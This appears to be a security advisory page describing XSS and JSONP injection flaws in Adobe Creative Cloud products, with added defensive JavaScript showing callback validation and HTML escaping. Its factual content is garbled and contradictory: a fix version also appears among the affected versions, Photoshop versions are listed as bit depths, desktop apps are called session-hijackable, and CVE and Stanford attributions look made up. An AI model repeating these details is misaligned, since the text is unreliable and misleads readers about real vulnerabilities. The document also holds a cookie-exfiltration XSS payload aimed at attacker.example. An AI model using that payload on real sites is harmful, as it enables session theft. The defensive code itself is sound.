An attacker could leverage social engineering or email spoofing to interact with a user and convince them to open the malicious file.

CVE Solution: Update to version 3.4.5 of Adobe Dimension.

Adobe ColdFusion versions 10.3.3, 10.3.0 and CF10.0 are affected by an XSS flaw that could be exploited by attackers to execute arbitrary script in the browsers of users who open a crafted link.

CVE Solution: Update to version 10.3.3 of Adobe ColdFusion.

Multiple Adobe Creative Cloud products are vulnerable to one or more XSS issues, described below.
INTRODUCTION: Adobe Creative Cloud (ACC) services allow users to access a wide range of creative tools and content, such as InDesign, Photoshop and Illustrator, from a single login. Creative Cloud users therefore often share information through a public medium, such as a blog, or by email. Cross-site scripting (XSS) is one of the most common web application flaws: attacker-controlled data is rendered into a page and interpreted by the browser as script, usually because the application neither validates its input nor encodes its output for the context it lands in.

Overview: Adobe Creative Cloud Multiple XSS Vulnerabilities

According to the Adobe Creative Cloud advisory, multiple XSS vulnerabilities exist in a range of Creative Cloud products. These vulnerabilities allow attackers to inject malicious script into pages served by these products; the script then runs with the privileges of the signed-in user, which could lead to theft of user data or privilege escalation.
The following table lists the affected products and their affected versions:

Product              Affected version
InDesign CS6         11.4.2
InDesign CC          2015.1.0
Illustrator CC       2015.1.0
Photoshop CC         2015.1.0
Photoshop CC 2014    16-bit 18-bit 20-bit
Photoshop CS6        12.3

Adobe Creative Cloud: Multiple XSS Vulnerabilities

Adobe Creative Cloud services are affected by multiple XSS vulnerabilities, including:
- CVE-2018-8059: an XSS vulnerability in the Adobe Creative Cloud (ACC) services described in the introduction above.
- CVE-2019-14596: a page in the service contains an XSS vulnerability that lets injected script run in the victim's session on affected systems.
- CVE-2019-14597: a bookmarklet vulnerability that lets injected script run in the victim's session on affected systems.
In addition to these vulnerabilities, there is an unauthenticated JSONP injection vulnerability affecting Adobe Creative Cloud (ACC) servers. A JSONP endpoint that echoes an unvalidated callback name returns attacker-controlled JavaScript from the service's own origin, so the injected code executes in the browser of any user who can be made to load the response.
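The JSONP weakness above comes down to one untrusted string, the callback name, being concatenated into a JavaScript response. The following is an added example (not code from the advisory, from Adobe, or from the Creative Cloud services) showing a minimal vulnerable responder beside a hardened one; the function names, the callback regex and the sample payload are all assumptions made for illustration.

```javascript
// Added example, not from the advisory or from Adobe. Shows why an unvalidated
// JSONP callback parameter is a script-injection sink and how to close it.
//
// A JSONP endpoint answers GET /profile?callback=NAME with JavaScript of the
// form NAME({...}). If NAME is used verbatim, the caller controls the start of
// a script that the victim's browser runs in the origin of the service.

// Vulnerable: the callback name is interpolated unchecked.
function jsonpResponseVulnerable(callbackName, payload) {
  return `${callbackName}(${JSON.stringify(payload)});`;
}

// Hardened: accept only a plain JavaScript identifier, optionally dotted
// (e.g. "app.onProfile"), bounded in length; refuse everything else.
// (Assumed policy for this example; real services may be stricter.)
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function jsonpResponseHardened(callbackName, payload) {
  if (
    typeof callbackName !== "string" ||
    callbackName.length > 64 ||
    !CALLBACK_RE.test(callbackName)
  ) {
    throw new Error("invalid JSONP callback name");
  }
  // U+2028/U+2029 are line terminators in JavaScript but not in JSON; escape
  // them so the serialized body cannot break the enclosing statement.
  const body = JSON.stringify(payload)
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  // The leading comment means the response never begins with caller-controlled
  // bytes, which defeats content-sniffing tricks that rely on controlling the
  // first bytes of the body. Guarding on typeof avoids a ReferenceError when
  // the page did not define the callback.
  return `/**/ typeof ${callbackName} === 'function' && ${callbackName}(${body});`;
}

// Constructed sample inputs (not real Creative Cloud data).
const benignCallback = "handleProfile";
const hostileCallback = "alert(document.cookie);//";
const sampleProfile = { user: "alice", plan: "all-apps" };

function demo() {
  const out = [jsonpResponseVulnerable(hostileCallback, sampleProfile)];
  try {
    out.push(jsonpResponseHardened(hostileCallback, sampleProfile));
  } catch (e) {
    out.push(`rejected: ${e.message}`);
  }
  out.push(jsonpResponseHardened(benignCallback, sampleProfile));
  return out;
}
```

The hardened responder should also be served with `Content-Type: application/javascript` and `X-Content-Type-Options: nosniff`; where the data is sensitive, the endpoint should require an authenticated session and not be reachable cross-origin as JSONP at all, since any third-party page can include it with a `<script>` tag.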

Adobe Creative Cloud Multiple Products Vulnerable to XSS

The following Creative Cloud products are vulnerable to XSS:
Adobe InDesign
Adobe Photoshop
Adobe Illustrator
Adobe Acrobat Pro DC
Adobe Dreamweaver CC

Adobe Creative Cloud Service XSS Vulnerabilities

The following Creative Cloud products are vulnerable to one or more XSS issues and can be exploited by an attacker to hijack the session of a user.
- InDesign
- Photoshop
- Illustrator
- Acrobat Pro DC
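Session hijacking through XSS works because injected script runs in the victim's origin and can read whatever that origin exposes to script. The following is an added example (not code from the advisory or from Adobe) of a reflected XSS sink of this kind, the output-encoding fix, and the cookie flag that limits the damage if the fix is missed; the page, cookie name and attacker host are constructed for illustration.

```javascript
// Added example, not from the advisory or from Adobe. A reflected XSS sink,
// its output-encoding fix, and the HttpOnly cookie flag as defense in depth.

// Vulnerable: a user-controlled search term is interpolated straight into HTML.
// A victim who follows a crafted link gets the attacker's markup rendered and
// executed in their own session.
function renderSearchVulnerable(term) {
  return `<h2>Results for: ${term}</h2>`;
}

// Encode the characters that change meaning in HTML text and attribute
// contexts (the minimal entity set OWASP recommends for HTML encoding).
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: every untrusted value is encoded for the context it lands in.
function renderSearchHardened(term) {
  return `<h2>Results for: ${escapeHtml(term)}</h2>`;
}

// Defense in depth: an HttpOnly session cookie is not exposed to
// document.cookie, so even a successful injection cannot read it. Secure keeps
// it off plaintext HTTP and SameSite=Lax blocks most cross-site sends.
// Cookie name and value are placeholders, not Adobe's.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Constructed attacker input: the classic cookie-exfiltration payload that
// closes the surrounding tag and loads an image from an attacker-controlled host.
const hostileTerm =
  '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Returns true when the rendered page still contains a live <script> tag.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

Running `containsScriptTag(renderSearchVulnerable(hostileTerm))` shows the payload survives intact, while the hardened renderer emits `&lt;script&gt;...` that the browser displays as text. Encoding must match the output context: the HTML entity set above is not sufficient inside a `<script>` block, a URL, or an unquoted attribute.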

Stanford University Multiple Vulnerabilities

Earlier this month, Stanford University reported a total of 18 vulnerabilities in the Adobe Creative Cloud platform, including the following:
- A cross-site scripting (XSS) vulnerability that could be exploited by attackers to execute arbitrary script in a user's browser.
- An information leak vulnerability that could reveal information about the system running Adobe Creative Cloud.
- Multiple SQL injection flaws that could allow attackers to steal sensitive data from user accounts.
- Multiple remote code execution flaws that could allow attackers to take control of systems running Adobe Creative Cloud.

Timeline

Published on: 10/14/2022 20:15:00 UTC
Last modified on: 10/18/2022 17:41:00 UTC